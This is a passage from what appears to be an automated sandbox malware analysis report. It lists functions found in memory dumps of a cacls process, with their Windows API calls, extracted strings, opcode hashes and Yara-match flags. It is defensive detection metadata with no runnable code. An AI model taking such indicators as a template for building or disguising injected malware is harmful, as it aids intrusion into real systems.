                                                                                                              • Instruction ID: 0c6a2a832f0ea6150bbe3aeaaadc35212917c002d21519bdd330e26492f3eb94
                                                                                                              • Opcode Fuzzy Hash: 4e02e0d7e3b3a53fe3a078bdd5fcac6e3ec5e91085e971d8e4e24b2f4b3ac688
                                                                                                              • Instruction Fuzzy Hash: 94113631A103047FEF60EBE0DC45FAA7379DF44360F004288FA0CAB190EB70A6009B91
                                                                                                              Function 02CE4890 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02CE4902
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                                                                              • Instruction ID: 42dc2335964b015e96b738199b79cee89c40b2291a8b65f07885b52954b9acb4
                                                                                                              • Opcode Fuzzy Hash: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                                                                              • Instruction Fuzzy Hash: AA011EB6E0020DABDF54EAA4DC41FDDB7B9AB54308F004195EA1997240F631EB18DB91
                                                                                                              Function 02CF9C70 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,02CE867E,00000010,?,?,?,00000044,?,00000010,02CE867E,?,?,?), ref: 02CF9CD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateInternalProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 2186235152-0
                                                                                                              • Opcode ID: 53127c51fb8e915e2ada1bd4b1e5bd03c96a5b42473f202cca94c82170286ba0
                                                                                                              • Instruction ID: 0e8f1c818353a13d1b1df38af356f5baadb9f9394afd15b9d565fb56cd4e8766
                                                                                                              • Opcode Fuzzy Hash: 53127c51fb8e915e2ada1bd4b1e5bd03c96a5b42473f202cca94c82170286ba0
                                                                                                              • Instruction Fuzzy Hash: F30180B6214208BBCB44DF99DC80EDB77AEAF8D754F508608BA19A3240D670F851CBA4
                                                                                                              Function 02CE4958 Relevance: 1.5, APIs: 1, Instructions: 43libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02CE4902
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                                                                              • Instruction ID: 89a1162978d431c22ee3a189d72ae5490e57324a79e8aa11cbe3e3a1872802a7
                                                                                                              • Opcode Fuzzy Hash: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                                                                              • Instruction Fuzzy Hash: 7EF07832E84208CFCF04CFE8DC42BD8B3B4FB56618F0406D9DA0A8B200E3626656CB45
                                                                                                              Function 02CD9DF0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02CD9E35
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2422867632-0
                                                                                                              • Opcode ID: 8abc526603ee69cc07ae379c75a4a6867cf3df2a5e9c00712d5c962cde03cd73
                                                                                                              • Instruction ID: 5bd0555299803981341b08f7d1a0fb130daff0a229d86c54a25ebef51e0576dd
                                                                                                              • Opcode Fuzzy Hash: 8abc526603ee69cc07ae379c75a4a6867cf3df2a5e9c00712d5c962cde03cd73
                                                                                                              • Instruction Fuzzy Hash: F0F0653338031437D76161E99C02FDBB24D8B817A1F15002AF70CDA1C4D592F50186A9
                                                                                                              Function 02CD9DEC Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02CD9E35
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2422867632-0
                                                                                                              • Opcode ID: c6d51795fe5fb80f5b7edaeae963119bc0c18f6b7ddc29b8439bdab75854f7f8
                                                                                                              • Instruction ID: 54e333dffb116a1a96740f1b588c2093f3482c9134abac61dd2ffad97e40a4e2
                                                                                                              • Opcode Fuzzy Hash: c6d51795fe5fb80f5b7edaeae963119bc0c18f6b7ddc29b8439bdab75854f7f8
                                                                                                              • Instruction Fuzzy Hash: 6EF0653234025477D77166A58C42FEBA75D8F81750F150019F74DAA1C4CAA2B901C7A4
                                                                                                              Function 02CE84A7 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02CE2040,02CF834F,02CF5A0E,02CE2006), ref: 02CE84E3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              • Opcode ID: a7eb58f124f42faa32bd0b98e24c9cc65d6b44fed8b2e29aa4dd18ffd073b925
                                                                                                              • Instruction ID: e84f6fb0aed6839aea9ff7c6501a34012ea899d1f73abe4319ab78eb5f517e58
                                                                                                              • Opcode Fuzzy Hash: a7eb58f124f42faa32bd0b98e24c9cc65d6b44fed8b2e29aa4dd18ffd073b925
                                                                                                              • Instruction Fuzzy Hash: A8E092362402057BFA109BE0DC47F56725DCB41791F0882A8FE0CDB281EA66E32096A5
                                                                                                              Function 02CF9BE0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D00305,00000007,00000000,00000004,00000000,02CE4101,000000F4), ref: 02CF9C1F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              • Opcode ID: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                                                                              • Instruction ID: caecd39a5d45c4fa373c8b79a69aa722e13ed06ca8f6471b5db073a6cec57653
                                                                                                              • Opcode Fuzzy Hash: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                                                                              • Instruction Fuzzy Hash: C3E06D712002047BC614EE99DC41FEB73ADEFC5710F004008FA08A7240CA70B9518BB4
                                                                                                              Function 02CF9B90 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(02CE1D39,?,02CF62C8,02CE1D39,02CF5A0E,02CF62C8,?,02CE1D39,02CF5A0E,00001000,?,?,?), ref: 02CF9BCC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                                                                              • Instruction ID: 6b92c1746080570e10aa300cdba7f289316375f719332e7e7b5c3c5244587c36
                                                                                                              • Opcode Fuzzy Hash: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                                                                              • Instruction Fuzzy Hash: 0BE06D72200208BBC654EE58DC40FDB73ADDFC9710F004408FA09A7241CA70B911CBF4
                                                                                                              Function 02CE86B9 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 02CE86EC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: 2753a7d038357cc6f3c72076476afa14903284bd2399edb8ffc59166543d03fa
                                                                                                              • Instruction ID: 456bff3a67cbb02f6839c3f98ebaba0835ced1c571ce716263a57ad9a3db7be2
                                                                                                              • Opcode Fuzzy Hash: 2753a7d038357cc6f3c72076476afa14903284bd2399edb8ffc59166543d03fa
                                                                                                              • Instruction Fuzzy Hash: 9CE026B12103042BEE24AE6CCC52FA2335C5B88728F584750F959DF3E6DB79F6024258
                                                                                                              Function 02CE86C0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 02CE86EC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: 15a8c1fbe4661d092a7777f04f65c76b4a3f90efd20042f133fff81cd82b29ad
                                                                                                              • Instruction ID: 3dc15ccb6c3272bd193db861336c9c8c675a09731653b8e4460d0250ba0f4a3d
                                                                                                              • Opcode Fuzzy Hash: 15a8c1fbe4661d092a7777f04f65c76b4a3f90efd20042f133fff81cd82b29ad
                                                                                                              • Instruction Fuzzy Hash: F4E026B12103042BEF246EACDC42F62334C9B88728F480760B95DCF3E1EB79F6024258
                                                                                                              Function 02CE84B0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02CE2040,02CF834F,02CF5A0E,02CE2006), ref: 02CE84E3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              • Opcode ID: 8dc3f67186c01a883a3194ad24f845b709415d137cd0f8e88734256b74fde265
                                                                                                              • Instruction ID: 9ca29660818dbb8395f26a47190854dd019269bf458cdd0784318fcd49af2330
                                                                                                              • Opcode Fuzzy Hash: 8dc3f67186c01a883a3194ad24f845b709415d137cd0f8e88734256b74fde265
                                                                                                              • Instruction Fuzzy Hash: 39D05E723403043BFA50A6E4CC02F56328D8B45794F094164BB4CDA2C1EAA5F2005AA9
                                                                                                              Function 03582C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: bf09a1baa98e66588c67bdba8944f42918147073f2d0276b8b7016cf7a20c953
                                                                                                              • Instruction ID: 458f12283b639b40284d695ea4db8366a4837148cbcdbe96e04a8aeba6def7a3
                                                                                                              • Opcode Fuzzy Hash: bf09a1baa98e66588c67bdba8944f42918147073f2d0276b8b7016cf7a20c953
                                                                                                              • Instruction Fuzzy Hash: DAB09B719015C5D5EE11F76056087177D4477D1711F1DC462D2034647E4739C1D1E175

                                                                                                              Non-executed Functions

                                                                                                              Function 02CD9E46 Relevance: 22.6, Strings: 18, Instructions: 105COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: "n$)t$,$/a$8n$=G$@$B`$Pq$Yu$Z4$jJ$p$us$x`$z`$q$~
                                                                                                              • API String ID: 0-2356214696
                                                                                                              • Opcode ID: c875c6ec67383d0d29adbdb32ef9365de5f47e6b0581c40d81612fe4a3a91e5d
                                                                                                              • Instruction ID: 4fd4ca462a41386c43db20e969ecd735a28cb5c10a76de158ca54597363e6eb6
                                                                                                              • Opcode Fuzzy Hash: c875c6ec67383d0d29adbdb32ef9365de5f47e6b0581c40d81612fe4a3a91e5d
                                                                                                              • Instruction Fuzzy Hash: 8C616DB0D05769CFEB20CF95D9587CEBAB1BB45308F5081C8D1583B281CBBA1A99CF95
                                                                                                              Function 034104BE Relevance: .2, Instructions: 152COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518105057.0000000003410000.00000040.00000800.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3410000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 720b3c8800e1a7a464067fd415588fc944cb1e4f28e4051148543ba0d3f05397
                                                                                                              • Instruction ID: 80f971935b4e48b2a19ae4785609555408207c03580db8a6bbefdaa7086cf085
                                                                                                              • Opcode Fuzzy Hash: 720b3c8800e1a7a464067fd415588fc944cb1e4f28e4051148543ba0d3f05397
                                                                                                              • Instruction Fuzzy Hash: 9A41E774618F094FD368EF69908167AF3E6FB45300F50052ED98ACB356EA70D8968788
                                                                                                              Function 02CDE4AE Relevance: .1, Instructions: 93COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 73c36f96b271d319de1f77b8161072988f165ba7113a8b2cd342946c574b8194
                                                                                                              • Instruction ID: 01383ed67ecdb83f7363161fe36d3e40b14d8636d04072178670dc2257040f8c
                                                                                                              • Opcode Fuzzy Hash: 73c36f96b271d319de1f77b8161072988f165ba7113a8b2cd342946c574b8194
                                                                                                              • Instruction Fuzzy Hash: E521FE3260620ADFC721CE2898868F6FF74FF0662472402DFD8908B642F313C82197C1
                                                                                                              Function 0341DF2A Relevance: 56.5, Strings: 45, Instructions: 211COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518105057.0000000003410000.00000040.00000800.00020000.00000000.sdmp, Offset: 03410000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3410000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                              • API String ID: 0-3558027158
                                                                                                              • Opcode ID: 6cdf6510e9a0c96c802cb82170c8c015373415e15c2748aa24174257426ba8d8
                                                                                                              • Instruction ID: 726dc429f433ce065e3b4ea6c6a22b8bb42a2aa55c0f40450d3751e78ac7a7e0
                                                                                                              • Opcode Fuzzy Hash: 6cdf6510e9a0c96c802cb82170c8c015373415e15c2748aa24174257426ba8d8
                                                                                                              • Instruction Fuzzy Hash: 5A9150F04082948AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8955CB85
                                                                                                              Function 03582890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: b289c3cc07d14fbab2bf20aaeb05887f3020c86a86807ddc246b26e0658f2af3
                                                                                                              • Instruction ID: 7eb48466dfb0f88ba23403ccaac7538ad422c69abd15607f00930a2524097ca9
                                                                                                              • Opcode Fuzzy Hash: b289c3cc07d14fbab2bf20aaeb05887f3020c86a86807ddc246b26e0658f2af3
                                                                                                              • Instruction Fuzzy Hash: A8512EB5A00216BFDF10EF98E88057EFBF8BB49200B548A69E465E7651D334DF518BE0
                                                                                                              Function 035F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 4744f971406023b550ddb7190ed0a25040203c231967fb5d72760fa44ce7bc8f
                                                                                                              • Instruction ID: 8d6547a544b49536f4042eef6d46e63bfea157f6fdf63c4f14740614f6cd2431
                                                                                                              • Opcode Fuzzy Hash: 4744f971406023b550ddb7190ed0a25040203c231967fb5d72760fa44ce7bc8f
                                                                                                              • Instruction Fuzzy Hash: 4E51E6B9A00A45AFDB20DF9CE89097FB7F9FB44200F048C59E695CB651E7B4DA408760
                                                                                                              Function 03577630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 035B46FC
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 035B4725
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 035B4742
                                                                                                              • Execute=1, xrefs: 035B4713
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 035B4655
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 035B4787
                                                                                                              • ExecuteOptions, xrefs: 035B46A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: 7847c06d4498ef53d7559fc0d75b3b56da8e3c3f4d71912383ed1aaac34ef2f4
                                                                                                              • Instruction ID: 309b23e023fbbadf270f821ba3c7b10eab70845f3063b0189409ee6a422cc897
                                                                                                              • Opcode Fuzzy Hash: 7847c06d4498ef53d7559fc0d75b3b56da8e3c3f4d71912383ed1aaac34ef2f4
                                                                                                              • Instruction Fuzzy Hash: 5151E775600319BBDB20EBA5FC85BFE77B8BB49304F0404A9D505AB1B1E771AA45CB90
                                                                                                              Function 03616940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                              • Instruction ID: 088892dec644f39d7ad18c30a785e6e06737af4b6a990de4d88e1b1e7dcddf49
                                                                                                              • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                              • Instruction Fuzzy Hash: 64020279508341AFC305DF28C590A6BBBF5EFC8704F088A6DF9899B264DB31E915CB42
                                                                                                              Function 0358B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction ID: b8cae0221e61cd9ba530f97c3b45b0d6e659ceb33bcd326d5949a103a8177c8f
                                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction Fuzzy Hash: A281BE70E052499EDF24EF69E8917BEBBBABF45310F1C465AD861B73B0C73498418B90
                                                                                                              Function 035F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                              • API String ID: 48624451-2819853543
                                                                                                              • Opcode ID: d13ae5fc19e99360f894b11fdb303f7551f9e03d6317731e85e20ed8d433f279
                                                                                                              • Instruction ID: d4f8f164d59120259e3c930f1c3ff0486f183e186f101c7b68fa862ce7bcd812
                                                                                                              • Opcode Fuzzy Hash: d13ae5fc19e99360f894b11fdb303f7551f9e03d6317731e85e20ed8d433f279
